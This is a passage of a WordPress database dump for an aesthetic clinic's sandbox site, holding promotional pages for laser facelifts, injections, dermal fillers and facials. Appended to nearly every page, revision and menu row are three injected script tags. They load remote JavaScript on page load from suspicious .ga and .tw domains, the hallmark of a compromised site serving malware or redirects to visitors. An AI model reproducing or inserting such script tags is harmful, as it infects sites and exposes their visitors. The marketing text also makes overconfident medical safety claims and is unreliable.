imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.</p>\n<p>This treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]</p>\n<h3>San Francisco</h3>\n<p>123 Nectar St. Suite 4917<br />\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]</p>\n<h3>British Columbia</h3>\n<p>58 Nectar Rd. Apt 2C<br />\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-autosave-v1','','','2018-01-11 04:47:36','2018-01-11 04:47:36','',6370,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6370-autosave-v1/',0,'revision','',0),(6373,1,'2017-12-27 13:55:58','2017-12-27 13:55:58','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\"][page_link link_url=\"#\" title=\"Link\" id=\"1514382844-1-24\" tab_id=\"1514382892751-8\"] [/page_link][page_link link_url=\"#\" title=\"Link\" id=\"1514382844-2-38\" tab_id=\"1514382892802-9\"] [/page_link][/page_submenu][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2017-12-27 13:55:58','2017-12-27 13:55:58','',6370,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6370-revision-v1/',0,'revision','',0),(6374,1,'2017-12-27 13:56:41','2017-12-27 13:56:41',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6374','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6374',9,'nav_menu_item','',0),(6375,1,'2017-12-27 13:58:01','2017-12-27 13:58:01','The signs of ageing are different in each individual. You never know what’s coming next. From fine lines and wrinkles to sunspots and pores will show up in Your face. But, Whatever the troubles that came into Your face, Our Experts can improve Your appearance and give You the great results in just a few weeks with 3D Laser Rejuvenation.\r\n\r\nIntroducing 3D Laser Rejuvenation, a world class system developed by expert beauticians and designed to treat multiple skin problems. This treatment will grant a healthy and youthful appearances. How does this thing work?\r\n\r\nThere are three tiers of 3D Laser Rejuvenation :\r\n<ol>\r\n 	<li>IPL (Intense Pulse Light)</li>\r\n</ol>\r\nOr also known as LimeLight procedure is a light-based procedure designed to reduce vascular lesions and hyperpigmentation such as redness, freckles, spider vein, sun damage, agespots and other signs ageing and skin degradation from the top layer of skin. This treatment can quickly restore a glowing radiance to the face, neck, chest, arms and hands.\r\n<ol start=\"2\">\r\n 	<li>Laser Genesis</li>\r\n</ol>\r\nLaser Genesis is a restorative treatment using energy to heat the middle layers of the skin, also improve the tone and texture of the skin by encouraging the collagen inside the body. While the LimeLight primarily corrects tone, the Laser Genesis optimizes skin textures.\r\n<ol start=\"3\">\r\n 	<li>Titan Skin Tightening</li>\r\n</ol>\r\nAdds the finishing touch by softening any remnants of fine lines, wrinkles and pores, discoloration and redness with Titan Skin Tightening. This treatment can stimulate the body’s production of Collagen also giving You a powerful combination of natural revitalization.\r\n\r\nThe treatment can be customized to the needs of individual skin types and conditions. Grab this complete treatment at Medikpro! Let Us hear Your needs and we will give You the results You expect.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Rejuvenation','','publish','closed','closed','','aesthetic-solutions-2-2','','','2017-12-27 13:58:01','2017-12-27 13:58:01','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6375',0,'page','',0),(6376,1,'2017-12-27 13:58:01','2017-12-27 13:58:01','The signs of ageing are different in each individual. You never know what’s coming next. From fine lines and wrinkles to sunspots and pores will show up in Your face. But, Whatever the troubles that came into Your face, Our Experts can improve Your appearance and give You the great results in just a few weeks with 3D Laser Rejuvenation.\r\n\r\nIntroducing 3D Laser Rejuvenation, a world class system developed by expert beauticians and designed to treat multiple skin problems. This treatment will grant a healthy and youthful appearances. How does this thing work?\r\n\r\nThere are three tiers of 3D Laser Rejuvenation :\r\n<ol>\r\n 	<li>IPL (Intense Pulse Light)</li>\r\n</ol>\r\nOr also known as LimeLight procedure is a light-based procedure designed to reduce vascular lesions and hyperpigmentation such as redness, freckles, spider vein, sun damage, agespots and other signs ageing and skin degradation from the top layer of skin. This treatment can quickly restore a glowing radiance to the face, neck, chest, arms and hands.\r\n<ol start=\"2\">\r\n 	<li>Laser Genesis</li>\r\n</ol>\r\nLaser Genesis is a restorative treatment using energy to heat the middle layers of the skin, also improve the tone and texture of the skin by encouraging the collagen inside the body. While the LimeLight primarily corrects tone, the Laser Genesis optimizes skin textures.\r\n<ol start=\"3\">\r\n 	<li>Titan Skin Tightening</li>\r\n</ol>\r\nAdds the finishing touch by softening any remnants of fine lines, wrinkles and pores, discoloration and redness with Titan Skin Tightening. This treatment can stimulate the body’s production of Collagen also giving You a powerful combination of natural revitalization.\r\n\r\nThe treatment can be customized to the needs of individual skin types and conditions. Grab this complete treatment at Medikpro! Let Us hear Your needs and we will give You the results You expect.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','3D Laser Rejuvenation','','inherit','closed','closed','','6375-revision-v1','','','2017-12-27 13:58:01','2017-12-27 13:58:01','',6375,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6375-revision-v1/',0,'revision','',0),(6377,1,'2017-12-27 13:58:54','2017-12-27 13:58:54',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6377','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6377',10,'nav_menu_item','',0),(6378,1,'2017-12-27 14:00:49','2017-12-27 14:00:49','Introducing You one of the most popular anti-aging procedures, providing a solution for light to medium depth facial dynamic: Anti-Wrinkle Injections or also known as Wrinkle Reduction Injections. To keeping Your face smooth and supple is not an easy task because wrinkles form as our skin gets older and the sun does its fair share of damage too.\r\n\r\nAnti wrinkle injections can be given in a variety of locations on the face. This includes the frown lines of the forehead, the corners of the mouth, along with the side of the nose, around the chin, near the jawline, and in other areas. There are as many as 11 lines just between the eyebrows, so there are plenty of options to improve appearance.\r\n\r\nAnti-wrinkle injections deliver a product derived from a purified protein to targeted the muscles that had a responsibility for the wrinkle-inducing movements of the face. Once injected, the product immediately begins to relax these specific muscles and lines and wrinkles being to soften. The injected treatment works by stopping communication between the nerve and the muscle, preventing the muscle in question from contracting and making the movements that would cause wrinkling of the skin.\r\n\r\nThe injections are completely safe, effective, and affordable way to rejuvenate the face and reduce the appearance of lines and wrinkles and it just takes as little as twenty minutes with results lasting for an average of three or four months.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Anti Wrinkle Injections','','publish','closed','closed','','aesthetic-solutions-2-3','','','2017-12-27 14:00:49','2017-12-27 14:00:49','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6378',0,'page','',0),(6379,1,'2017-12-27 14:00:49','2017-12-27 14:00:49','Introducing You one of the most popular anti-aging procedures, providing a solution for light to medium depth facial dynamic: Anti-Wrinkle Injections or also known as Wrinkle Reduction Injections. To keeping Your face smooth and supple is not an easy task because wrinkles form as our skin gets older and the sun does its fair share of damage too.\r\n\r\nAnti wrinkle injections can be given in a variety of locations on the face. This includes the frown lines of the forehead, the corners of the mouth, along with the side of the nose, around the chin, near the jawline, and in other areas. There are as many as 11 lines just between the eyebrows, so there are plenty of options to improve appearance.\r\n\r\nAnti-wrinkle injections deliver a product derived from a purified protein to targeted the muscles that had a responsibility for the wrinkle-inducing movements of the face. Once injected, the product immediately begins to relax these specific muscles and lines and wrinkles being to soften. The injected treatment works by stopping communication between the nerve and the muscle, preventing the muscle in question from contracting and making the movements that would cause wrinkling of the skin.\r\n\r\nThe injections are completely safe, effective, and affordable way to rejuvenate the face and reduce the appearance of lines and wrinkles and it just takes as little as twenty minutes with results lasting for an average of three or four months.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Anti Wrinkle Injections','','inherit','closed','closed','','6378-revision-v1','','','2017-12-27 14:00:49','2017-12-27 14:00:49','',6378,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6378-revision-v1/',0,'revision','',0),(6380,1,'2017-12-27 14:02:43','2017-12-27 14:02:43',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6380','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6380',11,'nav_menu_item','',0),(6381,1,'2017-12-27 14:03:37','2017-12-27 14:03:37','As your skin ages, it loses the collagen that helps shape and support it. Natural lines and wrinkles deepen, The skin also stretched a bit and begin to lose volume, sometimes resulting in sunken cheeks and a ‘dragged down’ appearance.\r\n\r\nBut nowadays, Dermal Fillers becomes popular treatment that helps to diminish facial lines and restore volume and fullness in the face or more specific popular treatment areas are around the forehead, eyes, mouth, chin, neck, and hands. With no downtime, this treatment is more effective also It grants You a younger look and the good news: The results are long lasting.\r\n\r\nWe used these three best cosmetic filler for Dermal Fillers Treatment:\r\n<ol>\r\n 	<li>Juvederm</li>\r\n</ol>\r\nJuvederm is contains Hyaluronic Acid – A naturally occurring sugar found in Your body - and it combines with water in Your skin to restore lost fullness and smooth out the wrinkles and lines. This instant treatment is approved by the Food and Drug Administration (FDA) and give You the natural looking results to last up to one year with one treatment.\r\n<ol start=\"2\">\r\n 	<li>Resytlane</li>\r\n</ol>\r\nOnly by working from within your skin to lift and restore Your skin structure, The Resytlane can add natural looking volume to your face and smooths wrinkles, fine lines, scars and folds. This treatment can be repeated once or twice a year to maintain your more youthful look.\r\n<ol start=\"3\">\r\n 	<li>Sculptra</li>\r\n</ol>\r\nSculptra is a long term wrinkle fillers that composed of Poly-L-Lactic Acid that replaces lost collagen. This treatment is often used to improve the appearance of hollowed cheeks and sunken eyes. The anti-ageing results are subtle and refined giving a more youthful appearance that can last more than two years.\r\n\r\nIn addition, to keep You safe while You are using Dermal Fillers, this treatment is only ever administered by Transform Doctors and Nurses. This means that you will always receive the highest standard of care to give You good results!<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Dermal Fillers','','publish','closed','closed','','aesthetic-solutions-2-4','','','2017-12-27 14:03:37','2017-12-27 14:03:37','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6381',0,'page','',0),(6382,1,'2017-12-27 14:03:37','2017-12-27 14:03:37','As your skin ages, it loses the collagen that helps shape and support it. Natural lines and wrinkles deepen, The skin also stretched a bit and begin to lose volume, sometimes resulting in sunken cheeks and a ‘dragged down’ appearance.\r\n\r\nBut nowadays, Dermal Fillers becomes popular treatment that helps to diminish facial lines and restore volume and fullness in the face or more specific popular treatment areas are around the forehead, eyes, mouth, chin, neck, and hands. With no downtime, this treatment is more effective also It grants You a younger look and the good news: The results are long lasting.\r\n\r\nWe used these three best cosmetic filler for Dermal Fillers Treatment:\r\n<ol>\r\n 	<li>Juvederm</li>\r\n</ol>\r\nJuvederm is contains Hyaluronic Acid – A naturally occurring sugar found in Your body - and it combines with water in Your skin to restore lost fullness and smooth out the wrinkles and lines. This instant treatment is approved by the Food and Drug Administration (FDA) and give You the natural looking results to last up to one year with one treatment.\r\n<ol start=\"2\">\r\n 	<li>Resytlane</li>\r\n</ol>\r\nOnly by working from within your skin to lift and restore Your skin structure, The Resytlane can add natural looking volume to your face and smooths wrinkles, fine lines, scars and folds. This treatment can be repeated once or twice a year to maintain your more youthful look.\r\n<ol start=\"3\">\r\n 	<li>Sculptra</li>\r\n</ol>\r\nSculptra is a long term wrinkle fillers that composed of Poly-L-Lactic Acid that replaces lost collagen. This treatment is often used to improve the appearance of hollowed cheeks and sunken eyes. The anti-ageing results are subtle and refined giving a more youthful appearance that can last more than two years.\r\n\r\nIn addition, to keep You safe while You are using Dermal Fillers, this treatment is only ever administered by Transform Doctors and Nurses. This means that you will always receive the highest standard of care to give You good results!<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Dermal Fillers','','inherit','closed','closed','','6381-revision-v1','','','2017-12-27 14:03:37','2017-12-27 14:03:37','',6381,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6381-revision-v1/',0,'revision','',0),(6383,1,'2017-12-27 14:04:18','2017-12-27 14:04:18',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6383','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6383',12,'nav_menu_item','',0),(6384,1,'2017-12-27 14:05:04','2017-12-27 14:05:04','Who do not upset if You have an acne prone skin? Moreover, air pollution increasingly larger. Dust and dirt stick to the face, mixed with oil that adorns our face. If added with the habit to not cleaning the face after doing outside activities, it is already confirmed that Your face becomes a natural target for acne to stays at there.\r\n\r\nAcne must have been acquainted with each person\'s face. But their arrival, would not be welcomed nice right? Various methods are used to throw them away from the face. Start from providing medicine, use a special soap to wash the face, to the most severe to solve acne by force. In the end, acne will spread to all areas of the face if it is carelessly handled.\r\n\r\nThe other way that most people do nowadays are Facial. A bit info, Facial handling can cause pain and also cause many side effects such as irritation, redness, allergies and can even grow more acne. If so, is there any treatment that is painless and also minimal side effects?\r\n\r\nMedikpro introducing Hydrafacial as beauty solutions nowadays that are free of pain because of the tools used in the form of vacuum which soften the dirt that can easily raised without having to suppress. Hydrafacial is the latest beauty technologies using hydra-dermabrasion techniques to cleanse, exfoliate dead skin cells, moisturize and provide a variety of nutrients such as antioxidants, aloe vera and vitamins needed by a conductive skin serum into the skin at the same time.\r\n\r\nHydrafacial has known and be one of most favourite treatment for many Hollywood Celebrity such as Paris Hilton, Beyonce, Eva Mendes, and many more. With Hydrafacial, get the rid of acne sensation that is safe and comfortable for Your face without pain. Make sure You select the proper treatment, because Your face needs to be given the best care.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydrafacial','','publish','closed','closed','','aesthetic-solutions-2-5','','','2017-12-27 14:05:04','2017-12-27 14:05:04','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6384',0,'page','',0),(6385,1,'2017-12-27 14:05:04','2017-12-27 14:05:04','Who do not upset if You have an acne prone skin? Moreover, air pollution increasingly larger. Dust and dirt stick to the face, mixed with oil that adorns our face. If added with the habit to not cleaning the face after doing outside activities, it is already confirmed that Your face becomes a natural target for acne to stays at there.\r\n\r\nAcne must have been acquainted with each person\'s face. But their arrival, would not be welcomed nice right? Various methods are used to throw them away from the face. Start from providing medicine, use a special soap to wash the face, to the most severe to solve acne by force. In the end, acne will spread to all areas of the face if it is carelessly handled.\r\n\r\nThe other way that most people do nowadays are Facial. A bit info, Facial handling can cause pain and also cause many side effects such as irritation, redness, allergies and can even grow more acne. If so, is there any treatment that is painless and also minimal side effects?\r\n\r\nMedikpro introducing Hydrafacial as beauty solutions nowadays that are free of pain because of the tools used in the form of vacuum which soften the dirt that can easily raised without having to suppress. Hydrafacial is the latest beauty technologies using hydra-dermabrasion techniques to cleanse, exfoliate dead skin cells, moisturize and provide a variety of nutrients such as antioxidants, aloe vera and vitamins needed by a conductive skin serum into the skin at the same time.\r\n\r\nHydrafacial has known and be one of most favourite treatment for many Hollywood Celebrity such as Paris Hilton, Beyonce, Eva Mendes, and many more. With Hydrafacial, get the rid of acne sensation that is safe and comfortable for Your face without pain. Make sure You select the proper treatment, because Your face needs to be given the best care.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydrafacial','','inherit','closed','closed','','6384-revision-v1','','','2017-12-27 14:05:04','2017-12-27 14:05:04','',6384,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6384-revision-v1/',0,'revision','',0),(6386,1,'2017-12-27 14:05:47','2017-12-27 14:05:47',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6386','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6386',13,'nav_menu_item','',0),(6387,1,'2017-12-27 14:06:44','2017-12-27 14:06:44','Dark circles or more called by “panda’s eye”, is one condition that nearly all people, especially for those who have started to enter the work’s  life and had much activity until late at night.\r\n\r\nMost of the people who consider the trivial and letting the dark circles under her eyes settled. In fact, dark circles can settle and thicken if left alone, and it will make the face look tired and dull. In the end, You do not feel confident if You have to meet people especially face to face with the person because it raised an unhealthy appearance from Your face as a result of the black circle.\r\n\r\nTherefore, as an Aesthetic Clinic that sensitive to Your needs, Medikpro offer Intense Eye Treatment as an effective solution to eliminate dark circles under Your eyes. Intense Eye Treatment is an ideal treatment that combines a powerful moisturizer and antioxidant to disguise dark circles under the eyes. In addition, Intense Eye Treatment can tighten, soften and hydrate the thin skin in the eye area in order to make eye becomes fresher.\r\n\r\nNow is time for You to get back Your bright and fresh face with Intense Eye Treatment. Do not let the dark circles under Your eyes preventing You to getting a charmed and stunningly beautiful face.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Intense Eye Treatment','','publish','closed','closed','','aesthetic-solutions-2-6','','','2017-12-27 14:06:44','2017-12-27 14:06:44','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6387',0,'page','',0),(6388,1,'2017-12-27 14:06:44','2017-12-27 14:06:44','Dark circles or more called by “panda’s eye”, is one condition that nearly all people, especially for those who have started to enter the work’s  life and had much activity until late at night.\r\n\r\nMost of the people who consider the trivial and letting the dark circles under her eyes settled. In fact, dark circles can settle and thicken if left alone, and it will make the face look tired and dull. In the end, You do not feel confident if You have to meet people especially face to face with the person because it raised an unhealthy appearance from Your face as a result of the black circle.\r\n\r\nTherefore, as an Aesthetic Clinic that sensitive to Your needs, Medikpro offer Intense Eye Treatment as an effective solution to eliminate dark circles under Your eyes. Intense Eye Treatment is an ideal treatment that combines a powerful moisturizer and antioxidant to disguise dark circles under the eyes. In addition, Intense Eye Treatment can tighten, soften and hydrate the thin skin in the eye area in order to make eye becomes fresher.\r\n\r\nNow is time for You to get back Your bright and fresh face with Intense Eye Treatment. Do not let the dark circles under Your eyes preventing You to getting a charmed and stunningly beautiful face.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Intense Eye Treatment','','inherit','closed','closed','','6387-revision-v1','','','2017-12-27 14:06:44','2017-12-27 14:06:44','',6387,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6387-revision-v1/',0,'revision','',0),(6389,1,'2017-12-27 14:07:11','2017-12-27 14:07:11',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6389','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6389',14,'nav_menu_item','',0),(6390,1,'2017-12-27 14:07:53','2017-12-27 14:07:53','<section id=\"main\">\r\n<div class=\"base-content\"><section class=\"page-content page-service\">\r\n<div class=\"container\">\r\n<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nNo more freckles, macules, and eye bags that can ruin Your face appearance. They are caused by under-eye pigmentation that is developed under the skin by factors such as UV Tanning, dryness of skin and makeup. To reduce the damages, it is necessary to speed up the skin cell turnover so as to increase the elimination of melanin deposits and prevent the formation of more deposits. And this unique treatment can help You to fix the damages on Your face.\r\n\r\nLaser Toning uses the laser energy to reduce visible pigmentation by breaking down melanin molecules naturally, allowing your immune system to remove them. This treatment has additional benefits in terms of improved skin tone and texture with low risk of adverse effects and of course: no downtime.\r\n\r\nDuring this treatment, You will feel a warm and gentle prickly sensation as the laser beam touches Your skin surface. It takes less than 15 minutes and You will leave with only mild redness that will fade within a few hours.\r\n\r\nA series of treatments are required to obtain the maximum benefit of treatment. Depending on Your skin condition and the advice from our doctors. We will give You a great result to fulfil Your expectations.\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\">\r\n<h2></h2>\r\n<div class=\"content\"></div>\r\n</div>\r\n<div class=\"block\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</section><footer id=\"footer\">\r\n<div class=\"container\">\r\n<div id=\"mauticform_wrapper_subscriber\" class=\"mauticform_wrapper col-sm-6\"><form id=\"mauticform_subscriber\" class=\"form-inline\" role=\"form\" action=\"https://medikpro.mautic.net/form/submit?formId=5\" autocomplete=\"false\" method=\"post\" data-mautic-form=\"subscriber\">\r\n<div class=\"mauticform-innerform\">\r\n<div class=\"mauticform-page-wrapper 